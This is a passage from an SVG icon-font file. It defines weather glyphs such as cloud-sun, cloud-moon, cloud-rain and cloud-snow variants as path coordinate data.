54.236-26.185 102.522-65.47 134.253v0 0zM767.966 652.827v0 0c-23.994 12.259-51.172 19.173-79.966 19.173-33.877 0-65.518-9.571-92.367-26.157-25.253 33.838-59.843 60.3-99.953 75.57 23.827 46.648 72.344 78.586 128.319 78.586 79.529 0 144-64.471 144-144 0-1.060-0.011-2.118-0.034-3.173zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xead5;" glyph-name="cloud-sun2" d="M798.509 632.988v0c39.285-31.731 64.644-80.018 65.47-134.253 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 16.689 0 32.952-1.825 48.599-5.287v0c28.1 59.847 88.911 101.287 159.401 101.287 97.202 0 176-78.798 176-176 0-7.799-0.507-15.48-1.491-23.012zM767.966 652.827c0.023 1.055 0.034 2.113 0.034 3.173 0 79.529-64.471 144-144 144-55.976 0-104.492-31.939-128.319-78.586 40.109-15.27 74.699-41.732 99.953-75.57 26.849 16.586 58.49 26.157 92.367 26.157 28.793 0 55.972-6.914 79.966-19.173v0zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xead6;" glyph-name="cloud-moon" d="M227.232 476.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM808.798 624c24.049 22.704 41.701 52.11 49.97 85.232 2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-13.674 1.559-26.984 4.51-39.761-30.227 15.202-64.369 23.761-100.51 23.761-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.752 49.341-21.807 93.757-55.181 125.265v0 0zM783.265 644.014v0 0c-27.458 17.709-60.162 27.986-95.265 27.986-33.877 0-65.518-9.571-92.367-26.157-9.765 13.085-20.926 25.066-33.262 35.725-11.699 20.822-18.371 44.848-18.371 70.432 0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-8.243-23.417-22.368-44.061-40.602-60.159z" />
<glyph unicode="&#xead7;" glyph-name="cloud-moon2" d="M808.798 624v0c33.374-31.508 54.429-75.924 55.181-125.265 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 36.141 0 70.283-8.559 100.51-23.761-2.951 12.777-4.51 26.087-4.51 39.761 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901-8.268-33.122-25.921-62.529-49.97-85.232zM783.265 644.014c18.234 16.098 32.359 36.742 40.602 60.159-2.608-0.115-5.231-0.173-7.867-0.173-97.202 0-176 78.798-176 176 0 2.636 0.058 5.259 0.173 7.867-56.019-19.719-96.173-73.104-96.173-135.867 0-25.584 6.672-49.61 18.371-70.432 12.336-10.658 23.497-22.64 33.262-35.725 26.849 16.586 58.49 26.157 92.367 26.157 35.104 0 67.807-10.277 95.265-27.986v0z" />
<glyph unicode="&#xead8;" glyph-name="cloud-rain" d="M227.232 476.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0 0zM863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM336 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM432 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM528 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM624 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM720 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0z" />
<glyph unicode="&#xead9;" glyph-name="cloud-rain2" d="M863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM336 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM432 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM528 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM624 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM720 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0z" />
<glyph unicode="&#xeada;" glyph-name="cloud-sun-rain" d="M227.232 476.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM798.509 632.988c0.983 7.531 1.491 15.212 1.491 23.012 0 97.202-78.798 176-176 176-70.49 0-131.301-41.44-159.401-101.287v0c-15.648 3.461-31.91 5.287-48.599 5.287-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.826 54.236-26.185 102.522-65.47 134.253v0 0zM767.966 652.827v0 0c-23.994 12.259-51.172 19.173-79.966 19.173-33.877 0-65.518-9.571-92.367-26.157-25.253 33.838-59.843 60.3-99.953 75.57 23.827 46.648 72.344 78.586 128.319 78.586 79.529 0 144-64.471 144-144 0-1.060-0.011-2.118-0.034-3.173zM336 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM432 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM528 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM624 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM720 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeadb;" glyph-name="cloud-sun-rain2" d="M798.509 632.988v0c39.285-31.731 64.644-80.018 65.47-134.253 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 16.689 0 32.952-1.825 48.599-5.287v0c28.1 59.847 88.911 101.287 159.401 101.287 97.202 0 176-78.798 176-176 0-7.799-0.507-15.48-1.491-23.012zM767.966 652.827c0.023 1.055 0.034 2.113 0.034 3.173 0 79.529-64.471 144-144 144-55.976 0-104.492-31.939-128.319-78.586 40.109-15.27 74.699-41.732 99.953-75.57 26.849 16.586 58.49 26.157 92.367 26.157 28.793 0 55.972-6.914 79.966-19.173v0zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeadc;" glyph-name="cloud-moon-rain" d="M227.232 476.904v0 0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM808.798 624.173c24.049 22.704 41.701 52.11 49.97 85.232 2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-13.674 1.559-26.984 4.51-39.761-30.227 15.202-64.369 23.761-100.51 23.761-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.752 49.341-21.807 93.757-55.181 125.265v0 0zM783.265 644.186v0 0c-27.458 17.709-60.162 27.986-95.265 27.986-33.877 0-65.518-9.571-92.367-26.157-9.765 13.085-20.926 25.066-33.262 35.725-11.699 20.822-18.371 44.848-18.371 70.432 0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-8.243-23.417-22.368-44.061-40.602-60.159zM336 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM432 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM528 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM624 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM720 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0z" />
<glyph unicode="&#xeadd;" glyph-name="cloud-moon-rain2" d="M808.798 624.173v0 0c33.374-31.508 54.429-75.924 55.181-125.265 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 36.141 0 70.283-8.559 100.51-23.761-2.951 12.777-4.51 26.087-4.51 39.761 0 82.452 56.698 151.662 133.232 170.768 11.244 2.807 22.917 4.533 34.901 5.060-5.268-14.965-8.133-31.061-8.133-47.827 0-79.529 64.471-144 144-144 16.766 0 32.863 2.865 47.827 8.133-0.527-11.984-2.253-23.656-5.060-34.901-8.268-33.122-25.921-62.529-49.97-85.232zM783.265 644.186c18.234 16.098 32.359 36.742 40.602 60.159-2.608-0.115-5.231-0.173-7.867-0.173-97.202 0-176 78.798-176 176 0 2.636 0.058 5.259 0.173 7.867-56.019-19.719-96.173-73.104-96.173-135.867 0-25.584 6.672-49.61 18.371-70.432 12.336-10.658 23.497-22.64 33.262-35.725 26.849 16.586 58.49 26.157 92.367 26.157 35.104 0 67.807-10.277 95.265-27.986v0 0zM336 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM432 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM528 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM624 96c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM720 160c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0z" />
<glyph unicode="&#xeade;" glyph-name="cloud-snow" d="M227.232 476.731c-56.845-13.107-99.232-64.079-99.232-124.731 0-70.692 57.534-128 128.090-128h543.82c70.742 0 128.090 57.451 128.090 128 0 60.078-41.554 110.489-97.34 124.273v0c0.884 6.449 1.34 13.035 1.34 19.727 0 79.529-64.471 144-144 144-39.217 0-74.773-15.677-100.742-41.107-31.71 62.374-96.494 105.107-171.258 105.107-106.039 0-192-85.961-192-192 0-12.048 1.11-23.836 3.232-35.269v0 0zM863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM320 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM416 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM544 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM640 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM736 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0z" />
<glyph unicode="&#xeadf;" glyph-name="cloud-snow2" d="M863.979 498.735c56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831v0c-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 73.534 0 138.793-35.433 179.633-90.157 26.849 16.586 58.49 26.157 92.367 26.157 96.289 0 174.518-77.324 175.979-173.265v0 0zM320 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM416 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM544 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM640 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM736 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0z" />
<glyph unicode="&#xeae0;" glyph-name="cloud-sun-snow" d="M227.232 476.731v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM798.509 632.988c0.983 7.531 1.491 15.212 1.491 23.012 0 97.202-78.798 176-176 176-70.49 0-131.301-41.44-159.401-101.287v0c-15.648 3.461-31.91 5.287-48.599 5.287-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.826 54.236-26.185 102.522-65.47 134.253v0 0zM767.966 652.827v0 0c-23.994 12.259-51.172 19.173-79.966 19.173-33.877 0-65.518-9.571-92.367-26.157-25.253 33.838-59.843 60.3-99.953 75.57 23.827 46.648 72.344 78.586 128.319 78.586 79.529 0 144-64.471 144-144 0-1.060-0.011-2.118-0.034-3.173zM320 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM416 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM544 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM640 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM736 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0z" />
<glyph unicode="&#xeae1;" glyph-name="cloud-sun-snow2" d="M798.509 632.988v0 0c39.285-31.731 64.644-80.018 65.47-134.253 56.585-24.664 96.021-81.082 96.021-146.735 0-88.186-71.626-160-159.982-160h-544.036c-88.542 0-159.982 71.634-159.982 160 0 65.628 39.669 122.189 96.381 146.831-0.253 4.357-0.381 8.748-0.381 13.169 0 123.712 100.288 224 224 224 16.689 0 32.952-1.825 48.599-5.287v0c28.1 59.847 88.911 101.287 159.401 101.287 97.202 0 176-78.798 176-176 0-7.799-0.507-15.48-1.491-23.012zM767.966 652.827c0.023 1.055 0.034 2.113 0.034 3.173 0 79.529-64.471 144-144 144-55.976 0-104.492-31.939-128.319-78.586 40.109-15.27 74.699-41.732 99.953-75.57 26.849 16.586 58.49 26.157 92.367 26.157 28.793 0 55.972-6.914 79.966-19.173v0 0zM624 960c-8.837 0-16-6.904-16-15.852v-64.295c0-8.755 7.422-15.852 16-15.852 8.837 0 16 6.904 16 15.852v64.295c0 8.755-7.422 15.852-16 15.852v0zM839.458 870.755c-6.248 6.248-16.196 6.432-22.523 0.104l-45.464-45.464c-6.191-6.191-5.961-16.457 0.104-22.523 6.248-6.248 16.196-6.432 22.523-0.104l45.464 45.464c6.191 6.191 5.961 16.457-0.104 22.523v0zM928.703 655.297c0 8.837-6.904 16-15.852 16h-64.295c-8.755 0-15.852-7.422-15.852-16 0-8.837 6.904-16 15.852-16h64.295c8.755 0 15.852 7.422 15.852 16v0zM408.542 870.755c-6.248-6.248-6.432-16.196-0.104-22.523l45.464-45.464c6.191-6.191 16.457-5.961 22.523 0.104 6.248 6.248 6.432 16.196 0.104 22.523l-45.464 45.464c-6.191 6.191-16.457 5.961-22.523-0.104v0zM320 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM416 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM544 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM640 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM736 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0z" />
<glyph unicode="&#xeae2;" glyph-name="cloud-moon-snow" d="M227.232 476.904v0c-2.123 11.433-3.232 23.221-3.232 35.269 0 106.039 85.961 192 192 192 74.764 0 139.548-42.733 171.258-105.107 25.969 25.429 61.525 41.107 100.742 41.107 79.529 0 144-64.471 144-144 0-6.692-0.457-13.278-1.34-19.727v0c55.786-13.784 97.34-64.195 97.34-124.273 0-70.549-57.348-128-128.090-128h-543.82c-70.556 0-128.090 57.308-128.090 128 0 60.652 42.388 111.624 99.232 124.731zM808.798 624.173c24.049 22.704 41.701 52.11 49.97 85.232 2.807 11.244 4.533 22.917 5.060 34.901-14.965-5.268-31.061-8.133-47.827-8.133-79.529 0-144 64.471-144 144 0 16.766 2.865 32.863 8.133 47.827-11.984-0.527-23.656-2.253-34.901-5.060-76.535-19.106-133.232-88.316-133.232-170.768 0-13.674 1.559-26.984 4.51-39.761-30.227 15.202-64.369 23.761-100.51 23.761-123.712 0-224-100.288-224-224 0-4.421 0.128-8.812 0.381-13.169-56.712-24.642-96.381-81.203-96.381-146.831 0-88.366 71.44-160 159.982-160h544.036c88.356 0 159.982 71.814 159.982 160 0 65.653-39.435 122.071-96.021 146.735-0.752 49.341-21.807 93.757-55.181 125.265v0 0zM783.265 644.186v0 0c-27.458 17.709-60.162 27.986-95.265 27.986-33.877 0-65.518-9.571-92.367-26.157-9.765 13.085-20.926 25.066-33.262 35.725-11.699 20.822-18.371 44.848-18.371 70.432 0 62.763 40.153 116.148 96.173 135.867-0.115-2.608-0.173-5.231-0.173-7.867 0-97.202 78.798-176 176-176 2.636 0 5.259 0.058 7.867 0.173-8.243-23.417-22.368-44.061-40.602-60.159zM320 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM416 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM544 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM640 32c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0zM736 128c-17.673 0-32-14.204-32-32 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 17.673-14.204 32-32 32v0z" />
